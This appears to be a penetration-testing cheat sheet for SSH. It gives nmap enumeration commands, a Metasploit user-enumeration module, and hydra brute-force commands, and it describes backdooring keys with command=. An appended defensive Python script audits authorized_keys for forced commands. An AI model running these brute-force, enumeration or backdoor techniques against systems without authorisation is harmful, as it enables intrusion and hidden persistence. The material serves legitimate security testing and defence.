SSH

Pentesting SSH - TCP Port 22

Theory

SSH (Secure Shell, also called Secure Socket Shell) is a network protocol that gives users a secure way to access a computer over an unsecured network.

The SSH protocol operates by default on TCP port 22.

Practice

Enumerate SSH server

We can use nmap to enumerate information about the running SSH server:

# Run the default nmap scripts against SSH and retrieve the version
nmap -p22 <ip> -sC -sV

# Run all SSH-related nmap scripts
nmap -p22 <ip> --script ssh-*

# Retrieve supported key exchange, cipher and MAC algorithms
nmap -p22 <ip> --script ssh2-enum-algos

# Retrieve the server host keys in full (to check for weak key types or sizes)
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full

# Check the authentication methods accepted for a given user
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root"

Enumerate Users

Some versions of OpenSSH are vulnerable to a timing attack that allows user enumeration. A Metasploit module exists to exploit this:

msfconsole
msf> use auxiliary/scanner/ssh/ssh_enumusers

Brute-Force Credentials

If the target host also exposes port 80 or 443, you can generate a wordlist from the contents of the website and use it with your brute-force tool.

When brute-forcing accounts, be aware that you may trigger account lockout.

# -t : Number of tasks
# -L/l : username list / username 
# -P/p : password list / password
hydra -l username -P passwords.txt <target-ip> ssh -t 4
hydra -L usernames.txt -p password <target-ip> ssh -t 4

# -s : Specific port
hydra -l username -P passwords.txt -s 2222 <target-ip> ssh -t 4
hydra -l username -P passwords.txt ssh://<target-ip>:2222 -t 4

Crack SSH Private Key

Some private keys are protected by a password or passphrase, so we may attempt to brute-force the passphrase offline.


Persistence

It's possible to backdoor an SSH public key by prefixing its entry with the command= option. The specified command will execute whenever the user logs in using this key.
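A defender-side check for this persistence technique, added here as an example and not taken from the original page: it parses authorized_keys entries (honouring quoted option values, which may themselves contain commas), computes the OpenSSH-style SHA256 fingerprint so findings can be matched against ssh-keygen -lf output, and flags every key that carries a forced command. The sample file content and the key blobs are constructed for the example.

```python
import base64
import hashlib

def split_outside_quotes(text, sep):
    """Split on sep, ignoring separators inside double-quoted option values."""
    parts, start, in_quote = [], 0, False
    for i, ch in enumerate(text):
        if ch == '"' and (i == 0 or text[i - 1] != "\\"):
            in_quote = not in_quote
        elif ch == sep and not in_quote:
            parts.append(text[start:i])
            start = i + 1
    parts.append(text[start:])
    return [p for p in parts if p]

def parse_entry(line):
    """Return the options, key type, OpenSSH-style SHA256 fingerprint and comment of one entry."""
    tokens = split_outside_quotes(line.strip(), " ")
    options = []
    if not tokens[0].startswith(("ssh-", "ecdsa-", "sk-")):  # leading options present
        options, tokens = split_outside_quotes(tokens[0], ","), tokens[1:]
    if len(tokens) < 2:
        raise ValueError("malformed authorized_keys entry")
    digest = hashlib.sha256(base64.b64decode(tokens[1])).digest()
    fp = "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    return {"options": options, "type": tokens[0], "fingerprint": fp, "comment": " ".join(tokens[2:])}

def audit(text):
    """Return (line no, fingerprint, comment, option) for every key with a forced command."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        entry = parse_entry(line)
        for opt in entry["options"]:
            if opt.lower().startswith("command="):
                findings.append((n, entry["fingerprint"], entry["comment"], opt))
    return findings

def _fake_key(kind, seed):  # syntactically valid key blob for the constructed sample only
    body = len(kind).to_bytes(4, "big") + kind.encode() + len(seed).to_bytes(4, "big") + seed
    return base64.b64encode(body).decode()

# Constructed sample: a plain key, a forced-command key and a key restricted with from=.
SAMPLE = "\n".join([
    "ssh-ed25519 " + _fake_key("ssh-ed25519", b"A" * 32) + " alice@laptop",
    'command="/tmp/.cache/run.sh",no-pty ssh-rsa ' + _fake_key("ssh-rsa", b"B" * 64) + " bob@pc",
    'from="10.0.0.0/8,192.168.0.0/16" ssh-ed25519 ' + _fake_key("ssh-ed25519", b"C" * 32) + " ops",
])
```

Run audit() over the contents of each user's ~/.ssh/authorized_keys (and any file named by AuthorizedKeysFile in sshd_config) and review every reported fingerprint against the keys you expect to be there.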
